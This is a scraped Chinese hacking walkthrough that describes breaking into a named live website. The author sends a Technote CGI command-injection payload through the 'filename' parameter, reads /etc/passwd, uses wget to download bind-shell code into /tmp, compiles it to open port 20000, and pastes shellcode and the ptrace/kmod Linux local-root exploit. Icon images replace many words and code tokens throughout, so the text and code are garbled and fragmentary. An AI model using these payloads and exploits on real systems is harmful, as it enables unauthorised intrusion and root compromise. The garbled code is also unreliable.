大家好
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
所以就写了
![](/icons/29273yi.gif)
![](/icons/29273dou.gif)
![](/icons/29273de.gif)
![](/icons/29273dou2.gif)
最近在家研究perl和UNIX服务器
![](/icons/29273de.gif)
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
![](/icons/29273de.gif)
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
转转吧
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
![](/icons/29273de.gif)
![](/icons/29273dou.gif)
![](/icons/29273main.gif)
![](/icons/29273de.gif)
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
知道了这是
![](/icons/29273yi.gif)
![](/icons/29273de.gif)
![](/icons/29273dou.gif)
![](/icons/29273de.gif)
![](/icons/29273yi.gif)
![](/icons/29273dou.gif)
![](/icons/29273de.gif)
![](/icons/29273de.gif)
![](/icons/29273dou2.gif)
Technote
![](/icons/29273de.gif)
![](/icons/29273main.gif)
![](/icons/29273dou.gif)
个漏洞以WEB进程权限在系统上执行任意命令
![](/icons/29273dou2.gif)
由于不正确过滤'filename'参数
![](/icons/29273dou.gif)
![](/icons/29273de.gif)
数内容
![](/icons/29273dou.gif)
![](/icons/29273dou2.gif)
给出利用思路方法
_num=5466654&board=rebarz99&command=down_load&filename=rb9.txt|id">http://[target]/cgi-bin/technote/
![](/icons/29273main.gif)
看了看利用思路方法觉得很简单
![](/icons/29273dou.gif)
![](/icons/29273yi.gif)
![](/icons/29273de.gif)
![](/icons/29273chengxu.gif)
![](/icons/29273dou.gif)
看了半天
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
![](/icons/29273de.gif)
![](/icons/29273dou.gif)
![](/icons/29273de.gif)
![](/icons/29273dou.gif)
修改路径
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
![](/icons/29273de.gif)
![](/icons/29273dou2.gif)
很高
![](/icons/29273de.gif)
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
![](/icons/29273de.gif)
![](/icons/29273yi.gif)
^_^.
好了开始咱们这次难得
![](/icons/29273de.gif)
![](/icons/29273dou.gif)
![](/icons/29273de.gif)
![](/icons/29273dou.gif)
![](/icons/29273de.gif)
![](/icons/29273dou.gif)
google.com就是方便
![](/icons/29273dou.gif)
![](/icons/29273yi.gif)
![](/icons/29273yi.gif)
![](/icons/29273dou.gif)
![](/icons/29273yi.gif)
![](/icons/29273dou.gif)
![](/icons/29273dou2.gif)
http://www.sealia.com/cgi-bin/technote/
![](/icons/29273main.gif)
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
按照绿盟给出
![](/icons/29273de.gif)
![](/icons/29273yi.gif)
![](/icons/29273dou.gif)
![](/icons/29273main.gif)
结果如图1
![](http://www.crazycoder.cn/WebFiles/20099/975d79b9-755d-42f8-8a9d-6881b3b806a2.g<img src='/icons/29273if.gif' />)
大家看到结果了
uid=99(nobody) gid=99(nobody) groups=99(nobody)
下面就开始利用我自己写
![](/icons/29273de.gif)
![](/icons/29273chengxu.gif)
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
我
![](/icons/29273chengxu.gif)
![](/icons/29273de.gif)
![](/icons/29273dou2.gif)
![](http://www.crazycoder.cn/WebFiles/20099/0e1fd06b-05c2-4a9e-b387-82cc8460a6cb.g<img src='/icons/29273if.gif' />)
依次输入IP和端口
![](/icons/29273dou.gif)
![](/icons/29273chengxu.gif)
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
如图3
![](http://www.crazycoder.cn/WebFiles/20099/4910520e-b037-4e56-89c6-c665d48e3941.g<img src='/icons/29273if.gif' />)
呵呵到这里我想大家
![](/icons/29273de.gif)
![](/icons/29273yi.gif)
![](/icons/29273dou.gif)
其实我也有这样
![](/icons/29273de.gif)
![](/icons/29273dou.gif)
![](/icons/29273de.gif)
![](/icons/29273dou.gif)
![](/icons/29273yi.gif)
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
![](/icons/29273de.gif)
![](/icons/29273de.gif)
![](/icons/29273dou.gif)
![](/icons/29273yi.gif)
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
![](/icons/29273de.gif)
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
![](/icons/29273de.gif)
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
![](/icons/29273de.gif)
![](/icons/29273dou.gif)
![](/icons/29273de.gif)
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
不错
![](/icons/29273dou.gif)
![](/icons/29273dou2.gif)
如图4
![](http://www.crazycoder.cn/WebFiles/20099/fec0ca84-3b3a-4a28-b385-6cca09ce8b2f.g<img src='/icons/29273if.gif' />)
呵呵已经得到/etc/passwd了
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
![](/icons/29273de.gif)
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
![](/icons/29273dou2.gif)
![](/icons/29273dou2.gif)
![](/icons/29273dou2.gif)
去forum.zone-h.org看看帖子吧
![](/icons/29273dou.gif)
![](/icons/29273de.gif)
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
如图5
![](http://www.crazycoder.cn/WebFiles/20099/ef820289-cef0-43ec-b652-aefb47454406.g<img src='/icons/29273if.gif' />)
呵呵见笑了
![](/icons/29273dou.gif)
![](/icons/29273de.gif)
![](/icons/29273dou.gif)
![](/icons/29273chengxu.gif)
![](/icons/29273dou.gif)
This _disibledevent=>
"\x31\xdb" // xor ebx, ebx
"\xf7\xe3" // mul ebx
"\xb0\x66" // mov al, 102
"\x53" // push ebx
"\x43" // inc ebx
"\x53" // push ebx
"\x43" // inc ebx
"\x53" // push ebx
"\x89\xe1" // mov ecx, esp
"\x4b" // dec ebx
"\xcd\x80" //
![](/icons/29273int.gif)
"\x89\xc7" // mov edi, eax
"\x52" // push edx
"\x66\x68\x4e\x20" // push word 8270
"\x43" // inc ebx
"\x66\x53" // push bx
"\x89\xe1" // mov ecx, esp
"\xb0\xef" // mov al, 239
"\xf6\xd0" // not al
"\x50" // push eax
"\x51" // push ecx
"\x57" // push edi
"\x89\xe1" // mov ecx, esp
"\xb0\x66" // mov al, 102
"\xcd\x80" //
![](/icons/29273int.gif)
"\xb0\x66" // mov al, 102
"\x43" // inc ebx
"\x43" // inc ebx
"\xcd\x80" //
![](/icons/29273int.gif)
"\x50" // push eax
"\x50" // push eax
"\x57" // push edi
"\x89\xe1" // mov ecx, esp
"\x43" // inc ebx
"\xb0\x66" // mov al, 102
"\xcd\x80" //
![](/icons/29273int.gif)
"\x89\xd9" // mov ecx, ebx
"\x89\xc3" // mov ebx, eax
"\xb0\x3f" // mov al, 63
"\x49" // dec ecx
"\xcd\x80" //
![](/icons/29273int.gif)
"\x41" // inc ecx
"\xe2\xf8" // loop lp
"\x51" // push ecx
"\x68\x6e\x2f\x73\x68" // push dword 68732f6eh
"\x68\x2f\x2f\x62\x69" // push dword 69622f2fh
"\x89\xe3" // mov ebx, esp
"\x51" // push ecx
"\x53" // push ebx
"\x89\xe1" // mov ecx, esp
"\xb0\xf4" // mov al, 244
"\xf6\xd0" // not al
"\xcd\x80"; //
![](/icons/29273int.gif)
![](/icons/29273main.gif)
![](/icons/29273kh.gif)
void (*a)
![](/icons/29273kh.gif)
![](/icons/29273int.gif)
pr
![](/icons/29273int.gif)
![](/icons/29273byte.gif)
pr
![](/icons/29273int.gif)
for(i=0;i
![](/icons/29273if.gif)
![](/icons/29273int.gif)
pr
![](/icons/29273int.gif)
a
![](/icons/29273kh.gif)
}
好了我们已经知道该下载地址
http://shellcode.org/Shellcode/Linux/shell-bind-shell.c了
![](/icons/29273dou.gif)
就可以用wget这个命令来下载了
![](/icons/29273dou.gif)
wget http://shellcode.org/Shellcode/Linux/shell-bind-shell.c -P /tmp意思
就是下载这个shell.c到/tmp目录下
![](/icons/29273dou.gif)
![](http://www.crazycoder.cn/WebFiles/20099/a5b5b159-0ebf-4aa4-bef3-3183926fcfc2.g<img src='/icons/29273if.gif' />)
然后ls /tmp得到下面
![](/icons/29273de.gif)
![](/icons/29273dou.gif)
2bdlost+foundmremap_pte.cmysql.sockptrace.csess_0a3d59b6da83717a4c05fbc5c6429982sess_12981c19e4cdab7bc426af965e7c85desess_33c246570a69e0846eaaedaef61f0402sess_4eb43cb41a450e8a7d15998fe4e9ef82sess_5c2048e3188733f41bba9a1ab44a4f3bsess_6405a9b3e0a809d7f298ad598f5de180sess_67fc6892112d2d780a092664353dcbbasess_9e3a2581194c05f598543f10294a95edsess_a0332a716e5c0a0932331ce9a5ec64d2sess_a159ec1f21a671d5cfe201c384d8da1csess_c6f579b218f096eb5ba11fdbad90f248sess_cdea344ed2940c99c1fcc146c5322882sess_f1e8e705bb1a6c5197ab61a22442da90shell-bind-shell.cshell-bind-shell.c.1ssh-XX0CyKEcssh-XX7eRJNnssh-XX89utqmssh-XXEmor9Xssh-XXhC36Gwssh-XXpOcVIAssh-XXrhx8enssh-XXss6aKsssh-XXw2rzSs
这个时候就介绍说明已经成功了
![](/icons/29273dou.gif)
![](/icons/29273yi.gif)
![](/icons/29273dou.gif)
在没有gcc就麻烦了
![](/icons/29273dou.gif)
![](/icons/29273de.gif)
[www.sealia.com]$ whereis -b gccDate: Sat, 29 Jan 2005 22:21:06 GMTServer: Apache/1.3.29 (Unix) mod_throttle/3.1.2 PHP/4.3.8 PHP/3.0.18Set-Cookie: sealiakleadata1=|||1|; expires=Sunday, 31-Dec-01 23:59:59 GMT;Set-Cookie: koX8iT3Dda=-kleadata1-;Transfer-Encoding: chunkedContent-Type: text/plain
12gcc: /usr/bin/gcc
好了找到gcc了
![](/icons/29273dou.gif)
![](/icons/29273de.gif)
![](/icons/29273dou.gif)
![](/icons/29273chengxu.gif)
编译成功在/tmp目录下多了
![](/icons/29273yi.gif)
![](/icons/29273de.gif)
![](/icons/29273chengxu.gif)
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
/tmp/bind
![](/icons/29273chengxu.gif)
![](/icons/29273de.gif)
![](/icons/29273chengxu.gif)
![](/icons/29273dou.gif)
![](/icons/29273chengxu.gif)
![](/icons/29273de.gif)
们知道他开了20000端口
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
哈哈连接上了这个时候摸瞎输入id;uname -a 我晕如何出现"command not found"
呢
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
![](/icons/29273chengxu.gif)
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
Note: To use this you will need to make sure that you append '\n\0' to your entered
![](/icons/29273string.gif)
![](/icons/29273jiajia.gif)
![](/icons/29273int.gif)
(nc is netcat).好了知道为什么了
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
![](http://www.crazycoder.cn/WebFiles/20099/186b9724-9613-4bfa-bf96-28160a3700f0.g<img src='/icons/29273if.gif' />)
呵呵到这里我们可爱
![](/icons/29273de.gif)
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
![](/icons/29273yi.gif)
![](/icons/29273de.gif)
![](/icons/29273dou.gif)
![](/icons/29273de.gif)
![](/icons/29273de.gif)
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
![](/icons/29273yi.gif)
![](/icons/29273de.gif)
![](/icons/29273chengxu.gif)
![](/icons/29273dou.gif)
![](/icons/29273yi.gif)
![](/icons/29273chengxu.gif)
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
![](/icons/29273de.gif)
![](/icons/29273chengxu.gif)
* Linux kernel ptrace/kmod local root exploit
*
* This code exploits a race condition in kernel/kmod.c, which creates
* kernel thread in insecure manner. This bug allows to ptrace cloned
* process, allowing to take control over privileged modprobe binary.
*
* Should work under all current 2.2.x and 2.4.x kernels.
*
* I discovered this stupid bug independently _disibledevent=> "\x90\x90\xeb\x1f\xb8\xb6\x00\x00"
"\x00\x5b\x31\xc9\x89\xca\xcd\x80"
"\xb8\x0f\x00\x00\x00\xb9\xed\x0d"
"\x00\x00\xcd\x80\x89\xd0\x89\xd3"
"\x40\xcd\x80\xe8\xdc\xff\xff\xff";
#
![](/icons/29273define.gif)
![](/icons/29273sizeof.gif)
pid_t parent = 1;
pid_t child = 1;
pid_t victim = 1;
volatile
![](/icons/29273int.gif)
void fatal(char * msg)
{
perror(msg);
kill(parent, SIGKILL);
kill(child, SIGKILL);
kill(victim, SIGKILL);
}
void putcode(unsigned long * dst)
{
char buf[MAXPATHLEN + CODE_SIZE];
unsigned long * src;
![](/icons/29273int.gif)
memcpy(buf, cliphcode, CODE_SIZE);
len = readlink("/proc/self/exe", buf + CODE_SIZE, MAXPATHLEN - 1);
![](/icons/29273if.gif)
![](/icons/29273dd.gif)
fatal("[-] Unable to read /proc/self/exe");
len
![](/icons/29273jiadeng.gif)
buf[len] = '\0';
src = (unsigned long*) buf;
for (i = 0; i < len; i
![](/icons/29273jiadeng.gif)
![](/icons/29273if.gif)
![](/icons/29273jiajia.gif)
![](/icons/29273jiajia.gif)
![](/icons/29273dd.gif)
fatal("[-] Unable to write shellcode");
}
void sigchld(
![](/icons/29273int.gif)
{
struct user_regs_struct regs;
![](/icons/29273if.gif)
![](/icons/29273jiajia.gif)
![](/icons/29273dd.gif)
![](/icons/29273return.gif)
fpr
![](/icons/29273int.gif)
![](/icons/29273if.gif)
![](/icons/29273dd.gif)
fatal("[-] Unable to read registers");
fpr
![](/icons/29273int.gif)
putcode((unsigned long *)regs.eip);
fpr
![](/icons/29273int.gif)
![](/icons/29273if.gif)
![](/icons/29273dd.gif)
fatal("[-] Unable to detach from victim");
exit(0);
}
void sigalrm(
![](/icons/29273int.gif)
{
errno = ECANCELED;
fatal("[-] Fatal error");
}
void do_child(void)
{
![](/icons/29273int.gif)
child = getpid
![](/icons/29273kh.gif)
victim = child + 1;
signal(SIGCHLD, sigchld);
do
err = ptrace(PTRACE_ATTACH, victim, 0, 0);
while (err
![](/icons/29273dd.gif)
![](/icons/29273dd.gif)
![](/icons/29273if.gif)
![](/icons/29273dd.gif)
fatal("[-] Unable to attach");
fpr
![](/icons/29273int.gif)
while (!gotchild) ;
![](/icons/29273if.gif)
![](/icons/29273dd.gif)
fatal("[-] Unable to
![](/icons/29273set.gif)
fpr
![](/icons/29273int.gif)
for(;;);
}
void do_parent(char * progname)
{
struct stat st;
![](/icons/29273int.gif)
errno = 0;
![](/icons/29273socket.gif)
do {
err = stat(progname, &st);
} while (err
![](/icons/29273dd.gif)
![](/icons/29273if.gif)
![](/icons/29273dd.gif)
fatal("[-] Unable to stat myself");
alarm(0);
system(progname);
}
void prepare(void)
{
![](/icons/29273if.gif)
![](/icons/29273kh.gif)
![](/icons/29273dd.gif)
initgroups("root", 0);
![](/icons/29273set.gif)
![](/icons/29273set.gif)
execl(_PATH_BSHELL, _PATH_BSHELL, NULL);
fatal("[-] Unable to spawn shell");
}
}
![](/icons/29273int.gif)
![](/icons/29273main.gif)
![](/icons/29273int.gif)
{
prepare
![](/icons/29273kh.gif)
signal(SIGALRM, sigalrm);
alarm(10);
parent = getpid
![](/icons/29273kh.gif)
child = fork
![](/icons/29273kh.gif)
victim = child + 1;
![](/icons/29273if.gif)
![](/icons/29273dd.gif)
fatal("[-] Unable to fork");
![](/icons/29273if.gif)
![](/icons/29273dd.gif)
do_child
![](/icons/29273kh.gif)
![](/icons/29273else.gif)
do_parent(argv[0]);
![](/icons/29273return.gif)
}CRTL+C保存
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
![](/icons/29273chengxu.gif)
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
![](/icons/29273de.gif)
![](/icons/29273dou.gif)
![](/icons/29273de.gif)
![](/icons/29273yi.gif)
![](/icons/29273dou.gif)
![](/icons/29273yi.gif)
![](/icons/29273de.gif)
![](/icons/29273de.gif)
![](/icons/29273dou.gif)
![](/icons/29273de.gif)
![](/icons/29273yi.gif)
![](/icons/29273dou.gif)
![](/icons/29273yi.gif)
![](/icons/29273de.gif)
![](/icons/29273de.gif)
![](/icons/29273dou.gif)
![](/icons/29273dou.gif)
![](/icons/29273de.gif)
![](/icons/29273yi.gif)
![](/icons/29273yi.gif)
![](/icons/29273de.gif)
![](/icons/29273yi.gif)
最新评论